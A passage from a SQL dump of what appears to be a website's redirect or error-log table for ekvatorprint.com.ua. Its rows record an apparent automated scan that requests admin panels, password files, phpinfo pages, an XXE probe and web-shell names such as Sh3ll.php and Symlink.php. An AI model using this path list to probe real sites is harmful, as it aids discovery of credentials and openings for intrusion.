13:26:49','0000-00-00 00:00:00',301),(4373,'http://ekvatorprint.com.ua/Login.shtml',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4374,'http://ekvatorprint.com.ua/MAINTAINERS.txt',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4375,'http://ekvatorprint.com.ua/META-INF/context.xml',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4376,'http://ekvatorprint.com.ua/META-INF',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4377,'http://ekvatorprint.com.ua/MANIFEST.MF',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4378,'http://ekvatorprint.com.ua/Mail/smtp/Admin/smadv.php',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4379,'http://ekvatorprint.com.ua/MMWIP',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4380,'http://ekvatorprint.com.ua/Mail/smtp/Admin/smadv.',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4381,'http://ekvatorprint.com.ua/Makefile',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4382,'http://ekvatorprint.com.ua/Members',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4383,'http://ekvatorprint.com.ua/Members.php',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4384,'http://ekvatorprint.com.ua/Members.',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4385,'http://ekvatorprint.com.ua/Members.cgi',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4386,'http://ekvatorprint.com.ua/Members.htm',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4387,'http://ekvatorprint.com.ua/Members.html',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4388,'http://ekvatorprint.com.ua/Members.jsp',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4389,'http://ekvatorprint.com.ua/Members.pl',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4390,'http://ekvatorprint.com.ua/Members.py',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4391,'http://ekvatorprint.com.ua/Members.rb',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4392,'http://ekvatorprint.com.ua/Members.shtml',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4393,'http://ekvatorprint.com.ua/MessageDrivenBeans/docs/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4394,'http://ekvatorprint.com.ua/MessageDrivenBeans/docsservlet/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4395,'http://ekvatorprint.com.ua/Microsoft-Server-ActiveSync/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4396,'http://ekvatorprint.com.ua/Micros~1/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4397,'http://ekvatorprint.com.ua/MyAdmin/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4398,'http://ekvatorprint.com.ua/MySQL/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4399,'http://ekvatorprint.com.ua/MySQLadmin',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4400,'http://ekvatorprint.com.ua/MySQLAdmin',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4401,'http://ekvatorprint.com.ua/NetAdmin',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4402,'http://ekvatorprint.com.ua/New Folder',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4403,'http://ekvatorprint.com.ua/New folder (2)',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4404,'http://ekvatorprint.com.ua/News',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4405,'http://ekvatorprint.com.ua/OMA/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4406,'http://ekvatorprint.com.ua/OWA/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4407,'http://ekvatorprint.com.ua/ORASSO',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4408,'http://ekvatorprint.com.ua/ONLINE',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4409,'http://ekvatorprint.com.ua/Office/graph.php#xxe',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4410,'http://ekvatorprint.com.ua/OWA',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4411,'http://ekvatorprint.com.ua/OrderProcessorEJB/services/FrontGate',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4412,'http://ekvatorprint.com.ua/OrderProcessorEJB/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4413,'http://ekvatorprint.com.ua/OrderProcessorEJB/services/FrontGate/wsdl/',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4414,'http://ekvatorprint.com.ua/PHPINFO.',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4415,'http://ekvatorprint.com.ua/PHPinfo.',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4416,'http://ekvatorprint.com.ua/PHPINFO.php',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4417,'http://ekvatorprint.com.ua/PKG-INFO',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4418,'http://ekvatorprint.com.ua/PHP',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4419,'http://ekvatorprint.com.ua/PHPinfo.php',NULL,'','',1,0,'2017-01-20 13:26:50','0000-00-00 00:00:00',301),(4420,'http://ekvatorprint.com.ua/PORTAL',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4421,'http://ekvatorprint.com.ua/PMA/',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4422,'http://ekvatorprint.com.ua/PMA2005/',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4423,'http://ekvatorprint.com.ua/Passwd.txt',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4424,'http://ekvatorprint.com.ua/PORTAL30',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4425,'http://ekvatorprint.com.ua/PORTAL30_SSO',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4426,'http://ekvatorprint.com.ua/Passwd_Files/',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4427,'http://ekvatorprint.com.ua/PORTAL2',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4428,'http://ekvatorprint.com.ua/Pass.txt',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4429,'http://ekvatorprint.com.ua/Passwordlist.txt',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4430,'http://ekvatorprint.com.ua/Password',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4431,'http://ekvatorprint.com.ua/Password.txt',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4432,'http://ekvatorprint.com.ua/PlantsByWebSphere/docs',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4433,'http://ekvatorprint.com.ua/PhpInfo.php',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4434,'http://ekvatorprint.com.ua/Passwords/',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4435,'http://ekvatorprint.com.ua/PlantsByWebSphere',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4436,'http://ekvatorprint.com.ua/Passwords.txt',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4437,'http://ekvatorprint.com.ua/PhpInfo.',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4438,'http://ekvatorprint.com.ua/Polls_admin',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4439,'http://ekvatorprint.com.ua/Privacy.html',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4440,'http://ekvatorprint.com.ua/Products',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4441,'http://ekvatorprint.com.ua/Progra~1',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4442,'http://ekvatorprint.com.ua/Profile',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4443,'http://ekvatorprint.com.ua/README.html',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4444,'http://ekvatorprint.com.ua/README.htm',NULL,'','',1,0,'2017-01-20 13:26:51','0000-00-00 00:00:00',301),(4445,'http://ekvatorprint.com.ua/README',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4446,'http://ekvatorprint.com.ua/Public/',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4447,'http://ekvatorprint.com.ua/README_VELOCE',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4448,'http://ekvatorprint.com.ua/README.md',NULL,'','',3,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4449,'http://ekvatorprint.com.ua/RLcQq',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4450,'http://ekvatorprint.com.ua/Read',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4451,'http://ekvatorprint.com.ua/Read_Me.txt',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4452,'http://ekvatorprint.com.ua/RELEASE_NOTES.txt',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4453,'http://ekvatorprint.com.ua/Readme.txt',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4454,'http://ekvatorprint.com.ua/Remote-Administrator/',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4455,'http://ekvatorprint.com.ua/Remote-Access/',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4456,'http://ekvatorprint.com.ua/Remote_Execution/',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4457,'http://ekvatorprint.com.ua/RecoverPassword',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4458,'http://ekvatorprint.com.ua/RootCA.crt',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4459,'http://ekvatorprint.com.ua/RequestParamExample',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4460,'http://ekvatorprint.com.ua/SIMPLEDAD',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4461,'http://ekvatorprint.com.ua/Root',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4462,'http://ekvatorprint.com.ua/SQL',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4463,'http://ekvatorprint.com.ua/SamplesGallery',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4464,'http://ekvatorprint.com.ua/STATUS.txt',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4465,'http://ekvatorprint.com.ua/SVN/',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4466,'http://ekvatorprint.com.ua/SSODAD',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4467,'http://ekvatorprint.com.ua/SaveForLater.php',NULL,'','',1,0,'2017-01-20 13:26:52','0000-00-00 00:00:00',301),(4468,'http://ekvatorprint.com.ua/SVN',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4469,'http://ekvatorprint.com.ua/SaveForLater.',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4470,'http://ekvatorprint.com.ua/Scripts',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4471,'http://ekvatorprint.com.ua/Search',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4472,'http://ekvatorprint.com.ua/Secret',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4473,'http://ekvatorprint.com.ua/Searchadminbox.php',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4474,'http://ekvatorprint.com.ua/Secret/',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4475,'http://ekvatorprint.com.ua/Searchadminbox.',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4476,'http://ekvatorprint.com.ua/NTadmin',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4477,'http://ekvatorprint.com.ua/SessionExample',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4478,'http://ekvatorprint.com.ua/Server.php',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4479,'http://ekvatorprint.com.ua/Sh3ll.php',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4480,'http://ekvatorprint.com.ua/Shopadmin',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4481,'http://ekvatorprint.com.ua/SessionServlet',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4482,'http://ekvatorprint.com.ua/Signin.php',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4483,'http://ekvatorprint.com.ua/Signin.',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4484,'http://ekvatorprint.com.ua/Signin.cgi',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4485,'http://ekvatorprint.com.ua/Signin.htm',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4486,'http://ekvatorprint.com.ua/Signin.jsp',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4487,'http://ekvatorprint.com.ua/Signin.py',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4488,'http://ekvatorprint.com.ua/Signin.pl',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4489,'http://ekvatorprint.com.ua/Signin.rb',NULL,'','',1,0,'2017-01-20 13:26:53','0000-00-00 00:00:00',301),(4490,'http://ekvatorprint.com.ua/Signin/',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4491,'http://ekvatorprint.com.ua/SimpappServlet',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4492,'http://ekvatorprint.com.ua/Signin.shtml',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4493,'http://ekvatorprint.com.ua/Site.admin',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4494,'http://ekvatorprint.com.ua/SimpleServlet',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4495,'http://ekvatorprint.com.ua/SiteServer/Admin',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4496,'http://ekvatorprint.com.ua/SiteServer/Admin/commerce/foundation/driver.php',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4497,'http://ekvatorprint.com.ua/SiteServer/Admin/commerce/foundation/DSN.php',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4498,'http://ekvatorprint.com.ua/SiteServer/Admin/commerce/foundation/driver.',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4499,'http://ekvatorprint.com.ua/SiteServer/Admin/commerce/foundation/DSN.',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4500,'http://ekvatorprint.com.ua/SiteServer/Admin/knowledge/dsmgr/default.php',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4501,'http://ekvatorprint.com.ua/SiteServer/Admin/knowledge/dsmgr/default.',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4502,'http://ekvatorprint.com.ua/SiteServer/Publishing/viewcode.php',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4503,'http://ekvatorprint.com.ua/SiteServer/admin/findvserver.php',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4504,'http://ekvatorprint.com.ua/SiteServer/Publishing/viewcode.',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4505,'http://ekvatorprint.com.ua/SiteServer/admin/findvserver.',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4506,'http://ekvatorprint.com.ua/Siteadmin',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4507,'http://ekvatorprint.com.ua/Sites/Knowledge/Membership/Inspired/ViewCode.php',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4508,'http://ekvatorprint.com.ua/Sites/Knowledge/Membership/Inspired/ViewCode.',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4509,'http://ekvatorprint.com.ua/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.php',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4510,'http://ekvatorprint.com.ua/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4511,'http://ekvatorprint.com.ua/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.php',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4512,'http://ekvatorprint.com.ua/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.',NULL,'','',1,0,'2017-01-20 13:26:54','0000-00-00 00:00:00',301),(4513,'http://ekvatorprint.com.ua/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.php',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4514,'http://ekvatorprint.com.ua/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4515,'http://ekvatorprint.com.ua/Sites/Samples/Knowledge/Push/ViewCode.php',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4516,'http://ekvatorprint.com.ua/Sites/Samples/Knowledge/Search/ViewCode.',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4517,'http://ekvatorprint.com.ua/Sites/Samples/Knowledge/Push/ViewCode.',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4518,'http://ekvatorprint.com.ua/Smarty-2.6.3',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4519,'http://ekvatorprint.com.ua/SnoopServlet',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4520,'http://ekvatorprint.com.ua/SourceCodeViewer',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4521,'http://ekvatorprint.com.ua/Sites/Samples/Knowledge/Search/ViewCode.php',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4522,'http://ekvatorprint.com.ua/Sourceservlet-classViewer',NULL,'','',1,0,'2017-01-20 13:26:55','0000-00-00 00:00:00',301),(4523,'http://ekvatorprint.com.ua/StockQuote/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4524,'http://ekvatorprint.com.ua/StockQuote/services/xmltoday-delayed-quotes',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4525,'http://ekvatorprint.com.ua/StockQuote/services/xmltoday-delayed-quotes/wsdl/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4526,'http://ekvatorprint.com.ua/Statistik/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4527,'http://ekvatorprint.com.ua/StockServlet',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4528,'http://ekvatorprint.com.ua/SugarCRM',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4529,'http://ekvatorprint.com.ua/Security/login/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4530,'http://ekvatorprint.com.ua/Superadmin',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4531,'http://ekvatorprint.com.ua/Sym.php',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4532,'http://ekvatorprint.com.ua/Sysadmin',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4533,'http://ekvatorprint.com.ua/Symlink.php',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4534,'http://ekvatorprint.com.ua/Symlink.pl',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4535,'http://ekvatorprint.com.ua/Server/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4536,'http://ekvatorprint.com.ua/TEMP',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4537,'http://ekvatorprint.com.ua/TEMP/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4538,'http://ekvatorprint.com.ua/T3AdminMain',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4539,'http://ekvatorprint.com.ua/TEST',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4540,'http://ekvatorprint.com.ua/TMP',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4541,'http://ekvatorprint.com.ua/Signin.html',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4542,'http://ekvatorprint.com.ua/TechnologySamples/AddressBook/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4543,'http://ekvatorprint.com.ua/TechnologySamples/AddressBook',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4544,'http://ekvatorprint.com.ua/Taxonomy_admin',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4545,'http://ekvatorprint.com.ua/TechnologySamples/BulletinBoard',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4546,'http://ekvatorprint.com.ua/TODO',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4547,'http://ekvatorprint.com.ua/TechnologySamples/AddressBook/AddressBookServlet',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4548,'http://ekvatorprint.com.ua/TechnologySamples/BulletinBoard/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4549,'http://ekvatorprint.com.ua/TechnologySamples/AddressBook/servlet/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4550,'http://ekvatorprint.com.ua/TechnologySamples/BasicCalculator',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4551,'http://ekvatorprint.com.ua/TechnologySamples/BulletinBoardservlet',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4552,'http://ekvatorprint.com.ua/TechnologySamples/BasicCalculator/',NULL,'','',1,0,'2017-01-20 13:26:56','0000-00-00 00:00:00',301),(4553,'http://ekvatorprint.com.ua/TechnologySamples/Calendar',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4554,'http://ekvatorprint.com.ua/TechnologySamples/Calendar/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4555,'http://ekvatorprint.com.ua/TechnologySamples/JAASLogin',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4556,'http://ekvatorprint.com.ua/TechnologySamples/FormLogin',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4557,'http://ekvatorprint.com.ua/TechnologySamples/JAASLogin/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4558,'http://ekvatorprint.com.ua/TechnologySamples/FormLogin/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4559,'http://ekvatorprint.com.ua/TechnologySamples/FormLoginservlet',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4560,'http://ekvatorprint.com.ua/TechnologySamples/FilterServlet',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4561,'http://ekvatorprint.com.ua/TechnologySamples/FormLoginservlet/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4562,'http://ekvatorprint.com.ua/TechnologySamples/JAASLoginservlet',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4563,'http://ekvatorprint.com.ua/TechnologySamples/MovieReview',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4564,'http://ekvatorprint.com.ua/TechnologySamples/JAASLoginservlet/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4565,'http://ekvatorprint.com.ua/TechnologySamples/MovieReview/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4566,'http://ekvatorprint.com.ua/TechnologySamples/PageReturnerservlet',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4567,'http://ekvatorprint.com.ua/TechnologySamples/MovieReview2_0/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4568,'http://ekvatorprint.com.ua/TechnologySamples/ReadingList',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4569,'http://ekvatorprint.com.ua/TechnologySamples/PageReturner',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4570,'http://ekvatorprint.com.ua/TechnologySamples/MovieReview2_1/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4571,'http://ekvatorprint.com.ua/TechnologySamples/PageReturner/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4572,'http://ekvatorprint.com.ua/TechnologySamples/PageReturnerservlet/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4573,'http://ekvatorprint.com.ua/TechnologySamples/SimpleServlet',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4574,'http://ekvatorprint.com.ua/TechnologySamples/SimpleJSP',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4575,'http://ekvatorprint.com.ua/TechnologySamples/ReadingList/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4576,'http://ekvatorprint.com.ua/TechnologySamples/Subscription/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4577,'http://ekvatorprint.com.ua/TechnologySamples/Subscriptionservlet/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4578,'http://ekvatorprint.com.ua/TechnologySamples/SimpleJSP/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4579,'http://ekvatorprint.com.ua/TechnologySamples/SimpleServlet/',NULL,'','',1,0,'2017-01-20 13:26:57','0000-00-00 00:00:00',301),(4580,'http://ekvatorprint.com.ua/Templates',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4581,'http://ekvatorprint.com.ua/TechnologySamples/Taglib/',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4582,'http://ekvatorprint.com.ua/TechnologySamples/Taglib',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4583,'http://ekvatorprint.com.ua/ThankYou.php',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 